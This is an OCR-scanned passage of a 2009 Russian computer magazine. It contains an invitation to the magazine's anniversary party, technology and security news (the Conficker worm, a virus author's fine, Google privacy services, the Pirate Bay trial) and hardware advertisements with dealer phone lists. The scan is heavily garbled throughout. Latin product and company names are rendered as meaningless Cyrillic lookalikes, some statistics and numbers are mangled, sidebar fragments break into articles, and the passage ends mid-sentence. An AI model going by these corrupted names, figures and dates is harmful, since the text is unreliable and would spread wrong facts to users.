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ІПІГО 

Как и обещал недавно, мы тут решили замесить 
Х-тусовку по случаю минувшего десятилетия жур- 
нала. Ам и го, приглашаю тебя официально на День 
рождения лучшего компьютерного журнала. 

В программе у нас много отличного пива, хакерский 
чемпионат в формате СарШге 1:Ье Кад, разные конкур- 
сы и подарки. Весь замес пройдет в пивном рестора- 
не Тинькофф в четверг, 2 апреля. 



Все, что нужно для участия - это зарегиться на сайте 
раг1:у.хакер.ги. 



С Днем рождения, Хакер! 



|пікіі02, гл. ред.ХІ 



рагЫхакер.ги 
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МЕСАМЕѴЗ 



ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



МАРИЯ «МІРВІІІ» НЕФЕДОВА 

/ М1РтЬЬ@НЕАЬ.ХАКЕР.Ни / 



Мпіепсіо 
без картриджей 

Новая портативная приставка от компании Міпіепсіо 05 і, наконец, 
доберется до Европы и США. Произойдетэто совсем скоро — в апреле 
текущего года. Напомним, что в Японии 05і поя вилась еще прошлой 
осенью, но остальному миру, по традиции, пришлось подождать. Са- 
мым главным «нововведением» в приставке оказался отказ Міпіепсіо 
от поддержки игр для СатеВоу Абѵапсе и, соответственно, отсутствие 
слота для картриджей. Зато добавились две камеры (можно одно- 
временно снимать себя самого и что-нибудь перед собой, на лету 
добавляя эффекты), слот для 50-карт, экран 3.25”. По сути, 05і дорос 
до полноценного медиа-плеера. Благодаря функциям Міпіепбо 05і 
Сатега, Міпіепбо 05і ЗоипсІ и Міпіепбо 05і 5Ьор можно фотографи- 
ровать и обрабатывать фото, слушать и редактировать музыку и даже 
заниматься сетевым шопингом, подключившись к интернету через 
ѴѴіРі (у 05І имеется браузер). Цена приставки в Штатах составит 169.99 
долларов, в Европе — 149 евро, а вот относительно России ничего пока 
не известно. 

Обновленный 8куре 




В штате МісгозоД, по разным 



данным, насчитывается от 



5*М)до 



20 % 



сотрудников аутистов. 



Новую, четвертую версию Зкуредля ѴѴіпсІоѵѵзсами разработчики называютнаиболеезначительным 
обновлением программы за всю ее пятилетнюю историю. Но кардинальных перемен 5куре, по сути, 
не претерпел, — скорее, мы получили доработку и шлифовку некоторых возможностей. В частнос- 
ти, улучшена системауправления широкополосным доступом. Теперьдажелюдям с медленными 
каналами гарантируется отличное качество картинки, а тем, у кого двуядерный процессор, хорошая 
веб-камера и скорость соединения выше 400 Кб/с, — обещают видео с частотой обновления кар- 
тинки 30 кадров в секунду! Качество звука тоже повысилось, благодаря новому алгоритму кодиро- 
вания, который, ктомуже, загружает канал на 50% меньше, чем прежний. Переработке подвергся 
и интерфейс программы, — стал удобнее и дружественнее. Появилось переключение междудвумя 
режимами — «Компактным» и «Стандартным», а также немного упростили процесс подключения 
наушников, микрофона и веб-камеры. И — хорошая весть для покіа’водов! Зкуре и Мокіа объявили о 
началеофициальногосотрудничества.Теперьв мобильники любимойунасфинской фирмы, начиная 
с М-серии, будут интегрировать различные 5куре-удобства. Флагманом станетМокіа N97. 





Чтобы лз^ше видеть 



Тем, кто часто зависает в видеочатах и кому нуж- 
на качественная картинка в видеоконференци- 
ях, определенно придется по душе новая веб- 
камера от компании Сгеабѵе — Еіѵе! Сат Ѵібео 
ІМ Сіига. Девайс отличает 1 .3-ме га пиксельный 
сенсор, при помощи которого можно получать 
фото с разрешением 5.0 Мп (с программной 
обработкой) и качественную в идео -картинку. 
Имеется и встроенный микрофон, умеющий 
распознавать и отфильтровывать сторонние 
шумы, интерфейс 05В и полная совместимость 
с дизайном Ріид & СЬаІ; (после подключения 



камера сразу готова к работе и не требует 
инсталляции никакого дополнительного софта). 
В комплекте с устройством поставляется диск 
с ПО, включающий в себя тиѵееМоѵѵЗ.О и Еіѵе! 
СепШаІ Ргетіит. С последним редактирование 
изображения и добавление эффектов становит- 
ся делом пары кликов, а с функцией Зтагі; Расе 
Тгаскіпд можно не волноваться о выпадении из 
кадра — автоматика проконтролирует, чтобы го- 
ворящий всегда оставался в центре и в фокусе. 
На прилавки магазинов камера поступите этом 
месяце по ориентировочной цене 2250 рублей. 
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УСПЕХ = 
интеллект + 
технологии! 
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Мощный. 

Эффективный. 



Благодаря высочайшей производительности четырехъядерных процессоров Іпіеі® Хеоп® и 
традиционному качеству Р-ЗІуІе, один двухпроцессорный сервер Р-ЗІуІе® МагзИаІІ® МР 2021 
сегодня выполнит те задачи, для решения которых раньше требовалась производительность 
нескольких высокопроизводительных серверов. 



Жесткие диски: 

3 «горячей» замены ЗАТА или ЗАЗ 
Форм-фактор: 

10 для установки в стойку 



Краткие технические характеристики: 

Процессоры: 

до двух многоядерных процессоров Іпіеі® Хеоп® 

Оперативная память: до 32 ГБ 



К-$(у1е^Маг8Иа1Г NР2021 




Система качества проектирования, разработки 
и производства компании Р-ЗІуІе Сотриіегз 
сертифицирована по международному стандарту 
130 9001-2000. 



Сделано в России. Сделано на совесть! 



Оптовые поставки: 

ООО «Эр-Эс-Ай»: тел.: (495) 514-1419 

ѵѵѵѵѵѵ.геі.ги 

Техническая поддержка: 

ЗАО «Эр-Стайл Компьютере»: 
тел.: (495) 514-1417 
8-800-200-800-7 * 

ѵѵѵѵѵѵ. г-8Іу Іе-со т р иіегз. г и 
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Астрахань ТАН (8512) 39-42-54, 22-85-73, 22-67-35, 22-57-54 Братск БАЙТ (3953) 41-11-21, 41-38-34 Брянск Р-Зіуіе (4832) 41-17-40, 41-17-28 Владивосток Эр-Стайл ДВ (4232) 45-94-82, 
45-93-98 Волгоград Авико (8442) 75-83-92 Телесто (8442) 302-604 Воронеж Элмар Трейд (4732) 51-20-18, 53-15-12, 55-65-32 Гагарин Терра Софт (48135) 4-1790 Губкинский ПурИнформ 
(34536) 5-5719 Дубна Силиконовая долина (49621) 2-82-92 Екатеринбург Эр-Стайл Урал (3432) 616-086, 613-044, 614-300 Иваново Компьютерные системы (4932) 23-76-26 Калининград 
Балтик Стайл (4112) 99-11-99, 99-11-98 Калуга Грандком (4842) 79-63-55 Олерон (4842) 55-85-85 Кемерово Конкорд Про (3842) 56-14-24, 56-15-75 Киров ИТЦ Компьютер-Сервис (8332) 35- 

74- 24, 35-79-73 Костомукша Вымпел (814 59) 780-21 Кострома ИТ-Профессионал (4942) 626-903 Краснодар Бизнес Компьютер Центр - Юг (8612) 64-04-50 Красноярск ЛанСервис (3912) 

75- 12-91, 92, 93 Липецк Стек (4742) 776-301 Москва Компьютерплаза (495) 772-7600 Компания Р-5іуІе (495) 514-1410 Сибкон (495) 292-77-62 БЕЛМОНТ КОНСАЛТАНТС (495) 937-1606 СКАН 
(495) 739-50-05 АйСиЭс Новые Системы (495) 981-08-97 Микро-Тех (495) 786-77-37 (многокан.), 228-51-28 Системотехника 8-916-653-9876 Назрань Медиа-Сервис (928) 732-28-17 Нижний 
Новгород Эр-Стайл Волга (831) 278-40-01, 246-16-23, 246-16-22, 246-35-17 Новосибирск Эр-Стайл Сибирь (383) 214-14-30 Омск (3812) АльфаКом Компьютер 24-33-77, 25-13-46, 25-54-84 
Орёл Астрон Электроника (4862) 76-45-44, 43-36-93 Пенза ЭЛСИ (8412) 54-4141 (многокан.) Петрозаводск Илвес (8142) 74-37-37, 70-20-40, 70-69-09 Петропавловск-Камчатский АМН (4152) 
26-87-51 Ростов-на-Дону Эр-Стайл Дон (863) 293-93-04, 293-93-06, 293-90-94, 293-91-93 Рязань СВ-Сервис (4912) 45-55-44, 45-86-50 Самара Железная логика (846) 335-58-83, 334-87-29, 
279-02-25, 279-02-28 Санкт-Петербург Эр-Стайл СПб (812) 445-34-29 (многокан.) Саратов Мастер Софт Системе (8452) 47-02-67, 47-02-65 Старый Оскол Авантаж-информ (4725) 247-349, 
246-227 Тамбов Гитон (4752) 71-97-54 Ай Лоджик (4752) 72-39-07 КФ Аксиома (4752) 75-93-70 Тула ПитерСофт - НТ (4872) 35-55-00 Тверь Андреев Софт (4822) 55-11-62, 55-12-71, 55-11-93, 
33-50-98 Тула ПитерСофт-НТ (4872) 35-55-00 РЕЛЬСОМ (4872) 24-99-99 Тюмень Эр-Стайл Сибирь в Тюмени (3452) 41-41-95 Ульяновск Раздолье (8422) 41-28-82 Уссурийск В-Лазер (4234) 33- 
44-33, 33-71-87, 33-77-98 Уфа Онлайн (347) 223-82-28, 225-96-81, 223-54-46, 223-26-48 Хабаровск Эр-Стайл ДВ регион (4212) 31-45-30, 31-22-28, 31-22-29, 21-85-56 Челябинск Компьютеры 
и образование (351) 265-69-08, 265-69-09 Инженерный центр (351) 729-90-33, 232-52-62, 232-53-44 Чита ТНТ-Плюс (3022) 32-13-03 Южно-Сахалинск Гео-Строй Групп (4242) 42-99-74 Якутск 
Эльф-95 (4112) 45-73-33 Сибирская компания системной интеграции (4112) 34-30-28, 34-11-64, 34-14-64 Ярославль НПК Кари (4852) 47-99-09 Комдив (4852) 427-888 



бесплатный телефон для регионов России 
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На деле, мобильный интернет вне дома 



;нее 



6 % 



пользователей. 



МВД не нравятся 
анонимусы 

Кто-то определенно рассказал нашему правительству о существовании 
интернета. Все чаще оно стало задумываться о том, что с Сетью нужно 
«что-то делать». Что конкретно, — придумать не удается, поэтому чинов- 
ники выдвигают самые разнообразные предложения, ограничиваясь 
разве что степенью развитости воображения. Это было бы даже весело, 
если бы не тот факт, что любая из их «теорий» может стать законом. Вот 
и высказывания начальника Бюро специальныхтехнических меропри- 
ятий (БСТМ) МВД России генерал-полковника Бориса Мирошникова 
навевают безрадостные мысли. Господину Мирошникову очень не нра- 
вится повальная анонимность пользователей Сети, и он яро выступает 
за ее снижение. Приведем цитату: «Анонимность — это приглашение к 
преступлению, этототсамыйтемный переулок, в котором творятся зло- 
деяния. Дайте туда свет, и преступлений будет меньше». А противников 
таких мер, защитников свободы слова и гласности, Мирошников назы- 
вает демагогами, потакающими преступникам. Принимая во внимание, 
что в сходном ключе высказываются некоторые политики и даже видные 
сетевые деятели, возможно, вскоре мы действительно столкнемся с 
некими интернет-паспортами. 




Энергия из воздуха 




Россия в 2008 году стала лидером в деле 

генерации спама. От нас исходит 22 % 
мирового объема. 

Черви не сдаются 

Интересное продолжение получила история с червем Поѵѵпасіир (он же 
Кібо или СопГскег), эпидемия которого недавно постигла интернет и за- 
тронула даже Министерство обороны Великобритании и ВМС Франции. 
Червяк, блокирующий доступ кантивирусным сайтам и закачивающий 
на зараженную машину всевозможный малварь, обрел второе дыхание, 
переродившись в червя СопГскег В++. При загрузке вредоносного ПО на 
инфицированный компьютер новая версия действует еще изощреннее, 
но в целом схема заражения и работы осталась прежней. И она прекрас- 
но демонстрирует себя в деле — ботнет, созданный СопГскегуже стал 
одним из крупнейших в мире: речь идете миллионах зараженных ма- 
шин. Интересно другое — сложившаяся ситуация всерьез обеспокоила 
компанию МісгозоИ Та назначила вознаграждение в размере $250.000 
за любую информацию, которая поможетнайти автора СопГскег. Впро- 
чем, в защиту МісгозоО: стоитсказать, что, хотя червь и использует для 
распространения брешь в Эегѵегзегѵісе (которая, конечно, полностью 
лежит на совести «мелкомягких»), заплатка для нее была доступна за 
пару месяцев до начала эпидемии. Лишнее подтверждение тому, что 
отключать ѴѴіпсІоѵѵз Прсіаіе — не самоеумное решение. 



ЧТО на сегодня 



Ьіпих установлен на 5 . 5 — 16.5 МЛН. 

десктопов. 



Не все британские ученые занимаются фигней. Вот яркий тому пример. 
В скором времени аэропортЛ иверпуля превратится в щадящий 
вариант «Матрицы». Там уже начался монтаж уникальной, автономной 
системы Есо-Вох, которая позволит, ни много, ни мало, преобразо- 
вывать углекислый газ, выдыхаемый пассажирами и посетителями, 
в биотопливо. Авторство революционной системы принадлежит 
компании Огідо ІпсІизФіез, и после опыта Ливерпульского аэропорта в 
Огідо надеются привлечь к перспективной разработке и других крупных 
клиентов. Выгода, в самом деле, налицо — выделяемый людьми С02 



улавливается специальными би о-тенами, установленными внутри 
здания и отправляется на переработку посредством микроорганизмов. 
Те, в свою очередь, поглощают газ и производят биомассу, которую 
уже и перерабатывают в конечное «зеленое»топливо. Вся система 
полностью автономна, а полученной энергии можно найти самое 
разное применение. Например, Ливерпульский аэропорт планируется 
отапливать исключительно за ее счет. Если все заработает, какдолжно, 
вполне возможно, что в будущем многие крупные здания смогутсами 
обеспечивать себя энергией. 
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Сетевое оборудование АЗУЗ 



і 






Прево^одные решения 
для Передачи данных 
и ІР-телефонии 



Г 



I 






АЗУЗ СІідаХ 1108Ы Ѵ2 

8-портовый гигабитный 
коммутатор со встроенным 
блоком питания, поддержкой 
^итЬо Ргате и режимом 
энергосбережения 



АЗиЗ АХ-112ѴѴ 

Универсальный ѴѴІРІ 
маршрутизатор со 
встроенным адаптером ѴоІР 
(ЗІР) для звонков через 
Интернет при помощи 
обычного телефона 



Азиз р^-xз^ 

Сетевой адаптер РІотеРІид 
АѴ 200М6/С для подключения 
через существующую 
электрическую проводку 



Всемирная гарантия 2 года 



ѵѵѵѵѵѵ.азиз.ги 



Горячая линия АЗиЗ: (495) 23-11-999 



Іпзрігіпд Іппоѵаііоп • Регзізіепі РегТесІіоп 



Партнеры: Москва (495): БЮРОКРАТ (495) 745-55-11; Коойоо ТесИпоІодіез (495) 256-17-31; 0101 (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-3210; ТКІМІТѴ-Е1ЕСТКОЫІС5 \ллш.Ігі-еІ.т; ІР Сотриіегз 961-00-09; ТесИОоте.ш 775-80-47; НИКС 974-33-33; СтартМастер 785-85-55; Формоза 234-21-64; Форум Компьютере 775-77-59; Профком 
730-56-03; Ф-Центр 1 05-64-47; Электрон-Сервис 737-44-99; НТ Компьютер 363-93-93; ОЗМ Сотриіегз 775-82-02; АРКИС (499) 612-96-90; Х-СОМ 7-999-600; Компьютер Маркет 500-03-04. 

С-Петербург (81 2): КЕЙ074; Компьютерный Мир 333-00-33; СофтДжойс 335-96-20; КорСи 259-1 8-93; РУСВЕЙ 275-28-08. 

Архангельск: Норланд (8182) 26-90-10; Белгород: Элси (4722) 55-86-11; Воронеж: РЕТ (4732) 77-93-39; Владивосток: 0М8 (4232) 300-454; Екатеринбург: Трилайн (343) 378-70-70, Белый Ветер Екатеринбург (343) 291-10-00, НТ Компьютер (343) 379-31-68; Жуковский: Байт (248) 741-38; Краснодар: Впадос (861) 210-10-01; Красноярск: Старком 
(3912) 49-11-11; Махачкала: Фирма АС (8722) 68-06-05; Мурманск: Мега Импекс (8152) 477-477; Нижний Новгород: ЮСТ (831) 225-28-23; Новокузнецк: Титан (3843) 70-38-38; Новосибирск: ЗЕТ НСК (383) 346-48-42, Техносити (383) 212-53-33, НТ Компьютер (383) 344-99-04; Омск: Компьюмаркет РИТМ (3812) 23-05-05; Петрозаводск: Компания «Р1» 
(8142) 781-323; Пермь: НТ Компьютер (342) 237-15-73; Псков: Все для ПК (8112) 72-72-75; Ростов-на-Дону: Иманго (863) 232-47-18, НТ Компьютер (863) 295-30-20; Солнечногорск: Компьютерный мир (469-26) 4-87-69; Сургут: Компьютерный супермаркет «Первый» (3462) 247-000; Сыктывкар: Эльф (8212) 291-083; Таганрог: Вист-Дон (8634) 315-023; 
Томск: ИНТАНТ (3822) 56-00-56; Тюмень: Техносити (3452) 26-1 9-72; Уфа: Форте ВД (347) 260-00-00, Кламас (347) 291-21-12; Ярославль: Сеть компьютерных салонов «Фронтекс» (4852) 58-58-58. 
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Приватность — миф 



Все же нету компанию называли «корпорацией зла». Всерьез задумать- 
ся об этом заставляютсразу несколько новостей от компании боодіе. 
Во-первых, семья из Питтсбурга, пытавшаяся привлечь боодіе ксуду 
за размещение снимков их дома в боодіе Марз, потерпела фиаско. Суд 
полностью встал на сторону корпорации, согласившись с ихтезисом: 
«Абсолютной приватности в наши дни не существует». Частная собст- 
венность или нет, — а боодіе все равно все видит и выкладывает в Сеть 
на всеобщее обозрение. Во-вторых, у Соодіе появилисьсразудва новых 
сервиса, узнав о которых все параноики дружно вооружились лопатами 
и отправились копать себе бункер в ближайшем парке. Первый — Соодіе 
НеаНб — будет собирать истории болезней и другую медицинскую ин- 
формацию о своих пользователях. Главное, сервистакже собирает дан- 
ные, получаемые от кардиостимуляторов, датчиков давления и других 
приборов, взаимодействующих стелом юзера\пациента. Получается, 
теперь, чтобы узнать, как чувствует себя бабушка, достаточно подклю- 
чить ее ксервису и спросить об этом Соодіе. 

Второй сервис, по сути, является новой функцией в Соодіе Марз — на- 
зывается Сабіисіе и ориентируется на мобильные девайсы (функцию 



поддерживают платформы АпбгоісІ и ѴѴіпбоѵѵз МоЬіІеб.О, большинство 
устройств ВІаскВеггу, іРЬопе, іРоб и смартфоны Мокіа на базе ЗутЬіап). 
С помощью Габіисіе ты легко можешь посмотреть, где сейчас находятся 
твои друзья, определив это по номеру их мобильного. Для этого нужно 
добавитьзнакомых, юзающих Ооодіе Марз, в «списокдрузей», а они 
должны разрешить тебе за ними шпионить. Разумеется, функцию можно 
отключить или составить белый и черный списки, но ощущение, что 
Оруэлл был прав, все равно не покидает. 




ИсследоваІ 



35*59^ эффективнее. 



Іем месте 



3 



монитора, работает на 




Отделался 
легким испугом 

Наш соотечественник Дмитрий Уваров, известный как автор вируса 
«Пенетратор», недавно предстал перед Калининградским судом. В про- 
шлом году детище Уварова едва не парализовало работу семи органов 
исполнительной власти Амурской области, включая городскую Думу 
Благовещенска, городской суд и УВД по Амурской области. В 
Сеть малварь просочился случайно — Дмитрий переслал файл другу 
(жителю Благовещенска), а тот допустил или спровоцировал утечку. Вирус 
был откровенно хулиганским — уничтожал аудио и графические файлы, 
а содержи мое документов МБѴѴогсІ заменял на нецензурщину. Властям, 
впрочем, пришлосьсовсем несмешно, иУварову, в итоге, грозилодотрех 
леттюремного заключения. Нотак как подсудимый раскаялся, полностью 
признал свою вину и оказывал следствию всяческую помощь и содействие, 
этозачлось — в и рус мейкер отделался штрафом в три тысячи рублей. Дейст- 
вительно, повезло. 



«Солнечные» дни в Питере 



Ежегодное мероприятие 5ип 
Тесб Вауз, организуемое ком- 
панией 5ип Місгозузіетз, 
невзирая на кризис, состо- 
ится и в этом году. Между- 
народная конференция уже 
в 4-й раз пройдет на территории России — в Санкт-Петербурге, с 
бпоЮапреля. Организаторы прогнозируют, что за это время 5ип 
Тесб Пауз посетят 1500 разработчиков ПО, студентов, преподава- 
телей вузов и технических специалистов. 

Конференция традиционно ориентирована на самую разную по 
степени подготовки публику, от начинающих до профессионалов. 
Всего будет представлено порядка 40 докладов, в том числе, о 
новых продуктах и обновленных выпусках ПО отБип Місгозузіетз 
— ОрепБоІагіз 2008. 1 1 , ОаѵаРХ, МеіВеапз 6.5, хѴМ Бегѵег, МуБОБ. 



Пройдут и ставшие уже традиционными мастер-классы, на этот 
раз по технологиям ОаѵаРХ и ОрепБоІагіз.Ав Ппіѵегзі1;уПау(10 
апреля] особое внимание будет уделено университетам, учебным 
программам, грантам, совместным инициативам и решениям. 
Отличительной чертой этого года станет появление среди доклад- 
чиков российских разработчиков, не являющихся сотрудниками 
5ип Місгозузіетз — они расскажут о собственных проектах и 
опыте. 

И конечно, не обойдется без известных личностей : главным до- 
кладчиком первого дня станет Джит Коул, вице-президент подраз- 
деления Сбепі: БоНѵѵаге Огоир, а второй день откроет выступление 
Боба Порраса, вице-президента подразделения Боіагіз Паіа, 
АѵаіІаЬібІу, БсаІаЬібІу и НРС корпорации 5ип Місгозузіетз Іпс. 
Участие в конференции, какобычно, бесплатное, а подробности 
можно найти по адресу: бІ:1:р://сІеѵе[орегз.зип.ги/і:есбсІаѵз2009 . 
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Попробуй, и тебе 
понравится 

Эксклюзивные видеоролики 
на ѵѵар.тізѵісіео.ги 



Вступи в Видеоклуб и получи бонус - 3 видеоролика! 
Набери т^225#Г 



ѵуар.т1;5ѵісІео.ги 



Услуга платная. Стоимость ѴѴАР/ѲРВ8 - трафика согласно тарифному плану абонента. 
Подробности - на сайте ѵѵѵѵѵѵ.тіз.ш 




оператор связи 



реклама 
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Альтернатива 
планшетным ПК 

Аты, дорогой читатель, пытаешься ткнуть в экран компьютера пальцем, «переоб- 
щавшись» с сенсорными дисплеями современных коммуникаторов? Не пережи- 
вай, я тоже так делаю, и специально для таких, какмы, компания НР выпустила 
ноутбук ТоисЬЗтагІ: 1:х22. Да, идея не нова, — планшетные ПК и интерактивные 
перьевые дисплеи существуют давно, но в НР догадались создать бюджетный 
вариант. Впрочем, на нетбукТоисбЗтагІ; 1x22 нетянет. Модель может похвастаться 
дисплеем с диагональю 12.1 ” и разрешением 1280x800 пикселей, который можно 
поворачивать на 180°, процессором АМО Тигіоп Х2 на 2.1 ГГц, двумя слотами ООР2 
РАМ (максимум 8 Гб, а в комплекте поставки — 3 Гб), видеокартой АТІ Рабеоп 
НО 3200 и 250 Гб места на жестком диске. Конечно, не обошлось без встроенной 
камеры и ОѴО-привода. Помимо перечисленного, в комплекте ноутбука значатся 
еще стилус и пульт ДУ, аккуратно убирающиеся в корпус, так, что риск их потерять 
минимален. Однако, самым интересным вТоисбЗтагІ: 1x22 все же остается цена. В 
то время, каканалогичные устройства у конкурентов начинаются от$1 .800-2.000, 
НР предлагаетсвой ноутбукпо цене в $1000. Правда, не будем забывать, что это 
цена для США, а официальные продажи в России, к сожалению, еще не начались. 



раза. 

Зараза от Билла Гейтса 

Билл Гейтс сегодня уже не принимаеттакого участия в делах 
МІСГ 050 І 1 , как некогда, и ни для кого это не секрет. Зато он вместе 
со своей женой Мелиндой активно занимается благотворительнос- 
тью — чета даже основала собственный фонд Вііі & Меііпсіа Оаіез 
Роипсіаііоп. И, видимо, мировые проблемы действительно не дают 
Гейтсу покоя. Иначе, как объяснить, что в ходе своего недавнего вы- 
ступления на ежегодной конференции ТЕО, рассказывая о проблеме 
малярии и способах ее распространения, он для пущей наглядности 
и убедительности выпустил в зал целый рой комаров из принесенной 
с собой банки? Это действо Билл сопроводил комментарием, что 
малярией совсем не обязательно должны болеть только бедные в 
странахтретьего мира. После некоторой паузы экс-глава Місгозоіі 
сжалился и успокоил публику, сообщив, что эти комары, конечно, не 
являются переносчиками заразы. А затем поведал, каких успехов их 
фонду удалось добиться в борьбе с этим страшным заболеванием. 
Что и говорить, дядюшка Билли с годами не утратил умения эпатиро- 
вать публику. 






Камерофон 

МоЬіІе ѴѴогШ Сопдгезз, прошедший в Барселоне, принес нам весть о 
новинке от компании Зону Егісззоп. Коммуникатор Ібои (название не 
окончательное, так что еще могут изменить) должен понравиться тем, 
кто любит фотографировать все, что попадается под руку. Впечатляет 
встроенная камера — 1 2.1 мегапикселей, вспышка, автофокус и функция 
автоопределения улыбки в кадре! Даже внешне смартфон похож на каме- 
ры серии Зону СуЬег-ЗбоІ, и уже не совсем понятно, что перед нами — мо- 
бильный со встроенным фотоаппаратом или фотоаппарате функцией 
мобильного телефона. К вышесказанному прибавим сенсорный дисплей 
диагональю 3.5” и разрешением 360x640 пикселей, акселерометр, 6РЗ- 
приемник, ЕМ-приемник, слот для тігсоЗВ-карт и интерфейсы ѴѴі-Еі, 
Віиеіооіб, иЗВ. Базироваться коммуникатор будет на новой платформе 
ЗутЬіап Роипсіаііоп, а в продажу поступитэтим летом. Цена девайса пока 
неизвестна. 
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ВСЕМИРНАЯ КОНТЕНТНАЯ СЕТЬ 




Создавай, живи, общайся! 

- Неограниченный бесплатный фото- и видеохостинг 

- Блоги, сообщества, форумы, мессенджер, почта 

- Личные страницы звезд музыки и кино, моды и спорта, 
бизнеса и политики 

- Новейшие хиты лучших музыкальных команд 

- Самые популярные телеканалы и лучшее видео 



220 МИЛЛИОНОВ ЧЕЛОВЕК НЕ ОШИБАЮТСЯ: 

ЗДЕСЬ ИНТЕРЕСНЕЕ! 



Реклама 



тедапеѵг 



Пародируем и машем 



Новая поправка кзакону об авторском праве грозит рунету настоящей 
катастрофой, — и все дело в формулировке: «Допускается без согласия 
автора или иного правообладателя и без выплаты вознаграждения 
воспроизведение гражданином при необходимости и исключитель- 
но в личных целях правомерно обнародованного произведения». А 
именно во фразе«при необходимости». Сейчасзакон просто разрешает 
человеку пользоваться произведением в личных целях, не выплачивая 
при этом вознаграждений автору и правообладателю, и если новую 
поправку примут— нас ожидаютсотни, если нетысячи исков. Ведь 
тогда придется доказывать, что у тебя действительно была «необходи- 
мость» сохранить на жесткий дискту или иную картинку. И с остальным 
контентом, будьто музыка, видео или текст — та же история. Более того, 
несладко придется провайдерам, владельцам хостингов и поисковикам, 
потому как их начнут привлекать в качестве соответчиков. Ассоциация 
«Интернет и бизнес», в которую входит20топовых компаний рунета, уже 
готовится обращаться в этой связи к Игорю Щеголеву — министру связи 
и массовых коммуникаций. Рядовым же пользователям остается только 
громко протестовать и готовиться переквалифицироваться в Петросяны 
или карикатуристы (единственное послабление в поправке предусмот- 
рено для материалов, которые гражданин хранит «для изготовления 
пародий»). Ну, или сушить сухари. Штрафза нарушение авторских прав 
составляет от 10 тыс. до 5 млн. рублей, а нанесение крупного ущерба 
может обернуться и двумя годамитюрьмы. 





Стало известно, что первым устройством на 
новой платформе Іоп от МѴісІіа станет неттоп, 
который появится уже в ближайшие три месяца. 
Неудивительно, учитывая, что Іоп ориентирован 
именно на нетбуки, мини-ПКи моноблоки на 
базе процессора Іпіеі АЬт. Главной особеннос- 
тью платформы являются ранее недоступные 
для подобных систем графические мощности, 
достигаемые за счет интегрированного графи- 
ческого ядра ОеРогсе 9400. Новинка превзойдет 
существующие чипсеты для АЬт по произво- 
дительности в десятки раз — «чудо-коробочка» 
потянет и последние игры, и видео в формате 
1 080р, а также может похвастаться поддержкой 
ѴѴіпсІоѵѵз Ѵізіа и ѴѴіпсІоѵѵзУ. Отдельный интерес 
вызывает цена — в МѴісІіа обещают, что устройс- 
тво будет стоить порядка $299. 

Нуа пока пользователи радуются, компания 
Іпіеі подает на МѴісІіа в суд. Производители 
диаметрально разошлись во мнениях итеперь 
никакие решат, что же важнее — СРО или ОРО. 
Впрочем, не обошлось и без финансовой сторо- 
ны вопроса — компании не могут договориться, 
кто, кому и сколько именно должен. 



83 % 



сайтов имеют критические уяз 



Іоп’изация 
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и никаких больше 
нетбуков! 

Еще в конце прошлого года агонизирующая компания Рзіоп высту- 
пила со странным заявлением, изрядно развеселившим сетевую 
общественность. В Рзіоп вдруг решили, что СМИ и производители, 
использующие слово «нетбук» (пеШоок), не имеют права этого делать. 
Оказывается, некогда компания анонсировала два сабноута и даже 
зарегистрировала их названия как товарную марку. Соль в том, что 
назывались девайсы пеіВоок и пеіВоок Рго. В связи с этим, ряд сайтов 
даже получил от Сапасііап Рзіоп Текіодіх (единственного подразделе- 
ния Рзіоп, оставшегося на плаву в наши дни) официальное предуп- 
реждение. Кпримеру, на картинке приведена реакция администрации 
сайта 6І2ППОСІО. На этом все могло и закончиться — Рзіоп получила 
вожделенную порцию пиара, и судиться ни с кем не спешила. Зато 
компании Веитакие заявления не понравились. В феврале представи- 
тели Вей обратились в Бюро по патентам и торговым маркам (СЗРТО) 
с просьбой лишить Рзіоп прав на товарную марку пеШоок. В конце 
концов, Рзіоп не делает этих устройств уже более шести лети явно не 
планирует возобновлять производство в будущем. Правду говорят 
— «не рой другому яму...». 
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Статистика = деньги 

Перед одной из крупнейших в мире социальных сетей РасеЬоокуже продолжительное время 
стоит проблема монетизации. Всем в компании ясно, что они сидят на золотой жиле, но 
придуматьспособ добычи из нее реальныхденег никак неудавалось. Похоже, эта проблема, 
наконец, разрешилась, притом самым очевидным образом. На сегодняшний день в РасеЬоок 
зарегистрировано более 150 млн. пользователей, и все эти люди, так или иначе, делятся инфор- 
мацией о себе. Для маркетологов возможность опроситьтакую аудиторию является буквально 
пределом мечтаний, и в РасеЬоок это поняли. На экономическом форуме в Давосе состоялась 
интерактивная презентация, в ходе которой сестра основателя компании Марка Цукерберга 
— Рэнди, продемонстрировала, какна свежесозданный в РасеЬоок опрос менее чем за 10 минут 
приходитсвыше 120.000 ответов. Полученныетаким образом результаты легко отфильтровать 
по полу, возрасту, религиозным взглядам и другим критериям, что открывает совершенно новые 
возможности для изучения общественного мнения. Теперь РасеЬоок собирается заключить 
контракты с несколькими транснациональными корпорациями и организовать крупнейшую на 
планете базу данных для маркетинговых исследований. 




Старая гвардия 
снова в строю 

Стивен Возняк, основавший вместе со Стивом Джобсом 
много лет назад компанию Арріе, вернулся в ІТ-сферу. 
Напомним, что Возняк покинул Арріе еще в 1 987 году и с 
тех пор успел поучаствовать в нескольких проектах и при- 
ложить руку ксозданию целого ряда фирм, но в последнее 
время наблюдал за ходом технического прогресса со сто- 
роны. Как Стивен признался прессе, долго сидеть без дела 
оннесмог — отдохнув и насладившись ролью зрителя, он 
примкнул к компании Ризіоп-іо. Этот перспективный стар- 
тап производит компактные модули 550-памяти, которые 
при своей цене в $10.000 не уступа ют продуктам конкурен- 
тов стоимостью более $100.000. В Ризіоп-іо Вознякзанял 
пост руководителя исследовательского отдела, вошел 
в советдиректоров и, судя по всему, является одним из 
совладельцев компании. С возвращением, «Воз»! 
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Здесь судят интернет 

В Стокгольме сейчас разворачивается действо, приковавшее вни- 
мание всего интернета и ведущих мировых СМИ. Там идет судебный 
процесс по делу основателей одного из крупнейшихторрент-трекеров 
в мире — ТЬе Рігаіе Вау(ТРВ). Четверым шведам, авторам скандально 
известного сайта, на этот раз предъявлен иск в содействии нарушению 
закона обавторском праве, грозящийтюремнымзаключением додвух 
лети штрафом в размере $140.000. Казалосьбы, им не привыкать, но 
к этому добавляется еще гражданский искот компаний ѴѴагпег Вгоз., 
МСМ Рісіигез, СоІитЬіа Рісіигез, 201:6 Сепіигу Рох и Зону ВМС. Гиганты 
индустрии развлечений требуют от четверки компенсацию в размере 14 
миллионов долларов. Противостояние «Голливуд ѵз пираты»транслиру- 
ется в инет всеми возможными способами — отТѵѵТіегдо видео. В Сети 
то здесь, то там собирают подписи в защитутрекера, хакеры взламывают 
сайты обвинения, оставляя угрозы и объявления войны, обвинители 
